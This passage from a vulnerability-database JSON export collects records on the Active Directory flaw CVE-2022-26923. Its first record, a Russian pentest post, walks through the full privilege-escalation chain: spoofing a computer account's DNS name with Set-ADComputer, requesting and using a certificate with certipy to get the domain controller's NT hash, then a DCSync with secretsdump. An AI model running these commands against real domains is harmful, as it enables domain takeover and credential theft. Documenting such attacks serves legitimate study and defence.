\u0432\u0435\u0440\u043d\u0451\u0442 \u043e\u0448\u0438\u0431\u043a\u0443 \u0438\u0437-\u0437\u0430 \u0434\u0443\u0431\u043b\u0438\u0440\u0443\u044e\u0449\u0435\u0439\u0441\u044f SPN\nSet-ADComputer TESTPC -ServicePrincipalName @{} # \u043e\u0431\u043d\u0443\u043b\u044f\u0435\u043c SPN\nSet-ADComputer TESTPC -DnsHostName DC.domain.local\n\u0412\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u043c\u0441\u044f \u043d\u0430 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u0445\u043e\u0441\u0442 \u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u043d\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442:\ncertipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine\n\u0410\u0432\u0442\u043e\u0440\u0438\u0437\u0443\u0435\u043c\u0441\u044f \u0441 \u043f\u043e\u043b\u0447\u0435\u043d\u043d\u044b\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c NTLM \u0445\u044d\u0448 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430:\ncertipy auth -pfx dc.pfx\n...\n[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733\n\u0414\u0430\u043b\u0435\u0435 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u043c \u0430\u0442\u0430\u043a\u0443 DCSync \u043b\u044e\u0431\u044b\u043c \u0443\u0434\u043e\u0431\u043d\u044b\u043c \u0434\u043b\u044f \u043d\u0430\u0441 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u043c \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u043c \u0434\u043e\u043c\u0435\u043d:\nsecretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt\n\u0412\u0435\u043a\u0442\u043e\u0440 \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0439 \u043a CVE-2022-26923 \u0441\u0440\u0435\u0434\u0435 Active Directory, \u043d\u043e \u0435\u0441\u043b\u0438 \u0432\u044b \u0432 \u043d\u0435\u0439 \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c, \u0442\u043e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0431\u0443\u0434\u0435\u0442 \u0442\u0430\u043a \u0436\u0435 \u043f\u0440\u043e\u0441\u0442\u043e, \u043a\u0430\u043a, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0435\u0439 ZeroLogon!\ud83d\udd3a\n#\u043f\u0435\u043d\u0442\u0435\u0441\u0442 #AD", "creation_timestamp": "2024-01-12T16:11:38.000000Z"}, {"uuid": "b0a97dfc-fb20-4ea0-9841-6f091c2fd0d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/6131", "content": "#Red_Team_Tactics\n1. Abusing CVE-2022-26923 through SOCKS5 on a Mythic C2 agent\nhttps://macrosec.tech/index.php/2022/06/01/abusing-cve-2022-26923-through-socks5-on-a-mythic-c2-agent\n2. Quantum Insert: bypassing IP\u00a0restrictions\nhttps://diablohorn.com/2017/05/21/quantum-insert-bypassing-ip-restrictions", "creation_timestamp": "2022-06-04T13:40:38.000000Z"}, {"uuid": "9e02bd9d-73b1-4587-af87-1c51bcf2437d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/5987", "content": "#Threat_Research\n1. BPFDoor - An Evasive Linux Backdoor Technical Analysis\nhttps://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis\n2. Active Directory Domain Privilege Escalation (CVE-2022-26923)\nhttps://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4", "creation_timestamp": "2022-05-12T11:01:01.000000Z"}]}